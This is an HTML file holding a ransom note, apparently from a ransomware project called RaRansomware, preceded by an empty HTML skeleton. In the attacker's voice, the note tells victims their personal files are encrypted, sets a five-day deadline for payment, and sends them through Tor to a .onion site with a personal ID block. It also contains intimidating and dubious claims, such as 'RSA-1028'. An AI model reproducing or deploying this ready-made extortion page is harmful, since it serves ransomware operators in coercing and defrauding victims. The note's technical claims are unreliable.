<html>
  <head>
    <title></title>
    <meta content="">
    <style></style>
  </head>
  <body></body>
</html><!DOCTYPE html>
<html>
    <head>
        <title>RaRansomware Recovery Instructions</title>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
       
       
        <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700"/>
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
        <style>
            * {
                font-family: "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
                font-size: 16px;
            }
 
            body, html, section {
                padding: 0;
                margin: 0;
            }
 
            section {
                padding: 150px 0;
                min-height: 100vh;
            }
 
            section h1 {
                font-size: 50px;
                font-weight: 600;
            }
 
            section p, a {
                font-size: 16px;
                line-height: 1.5;
                margin-bottom: 20px;
                color: white;
            }
 
            a {
                text-decoration: underline;
            }
 
            a:hover {
                color: #DFB0F9;
            }
 
            a:focus {
                color: #DFB0F9;
                outline: 0;
            }
 
            section {
                color: white;
                position: relative;
            }
 
            #note {
                background: #8005c4 url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' width='28' height='49' viewBox='0 0 28 49'%3E%3Cg fill-rule='evenodd'%3E%3Cg id='hexagons' fill='%236d06a7' fill-opacity='0.18' fill-rule='nonzero'%3E%3Cpath d='M13.99 9.25l13 7.5v15l-13 7.5L1 31.75v-15l12.99-7.5zM3 17.9v12.7l10.99 6.34 11-6.35V17.9l-11-6.34L3 17.9zM0 15l12.98-7.5V0h-2v6.35L0 12.69v2.3zm0 18.5L12.98 41v8h-2v-6.85L0 35.81v-2.3zM15 0v7.5L27.99 15H28v-2.31h-.01L17 6.35V0h-2zm0 49v-8l12.99-7.5H28v2.31h-.01L17 42.15V49h-2z'/%3E%3C/g%3E%3C/g%3E%3C/svg%3E");
            }
 
            .btc-address span {
                display: block;
                padding: 15px 20px;
                word-wrap: break-word;
 
            }
 
            .btn-default {
                display: inline-block;
                -moz-transition: all .35s;
                -webkit-transition: all .35s;
                border: none;
                border-radius: 300px;
                font-weight: 700;
                padding: 15px 30px;
                text-transform: uppercase;
                font-size: 26px;
                line-height: 1;
                cursor: pointer;
                background-color: #A2F300;
                color: #5D6C3F;
                text-decoration: none;
            }
 
            .btn-default:hover {
                background-color: #93D412;
            }
 
            .disabled {
                text-decoration: line-through;
            }
 
            .btn-default .glyphicon {
                margin-right: 10px;
                font-size: 22px;
            }
 
            [hidden] {
                display: none !important;
            }
 
            #form-upload {
                margin-top: 75px;
            }
 
            .container {
                height: 100%;
            }
           
            .private-key {
                white-space: pre-wrap;
                white-space: -moz-pre-wrap;
                white-space: -pre-wrap;
                white-space: -o-pre-wrap;
                word-wrap: break-word;
            }
        </style>
    </head>
    <body>
        <div id="content">
                <section id="note">
        <div class="container">
            <div class="row">
                <h1>All your files are belong to us!</h1>
                <p>
                    All your personal files, including, but not limited to: <br/>
                    <b>Photos, videos, databases and office projects have been encrypted</b> using a mix of two very strong cryptographic algorithms - <i>AES-128</i> and <i>RSA-1028</i>.
                    Original files have been overwritten, recovery tools and software will not help you.
                </p>
                <p>
                    The <b><u>only</u></b> way to recover your files, are to meet our demands.
                </p>
                <p>
                    Be warned, we won't be able to recover your files if you start fiddling with them.
                </p>
                <p>
 
                </p>
                <p>
                    <br/>
                    You have 120 hours (5 days) from this moment to send us payment, or you files will be lost in eternity.
                </p>
 
                <p>
                    To start the recovery process you need to download and install the Tor browser, which is easily done from their own <a href="https://www.torproject.org/download/download-easy.html.en">home-page.</a>
                </p>
                <p>
                    Once you have the Tor browser running you need to navigate to <u>http://recovery6m3lvkxg.onion</u> and then input your personal id displayed below. <br/>
                    Further payment instructions will be given once logged in.
                </p>
                <br/>
                <div class="container">
                    <pre class="private-key col-md-6 col-sm-8">[redacted 992 bytes in base64]
</pre>
                </div>
            </div>
        </div>
    </section>
        </div>
    </body>
</html>
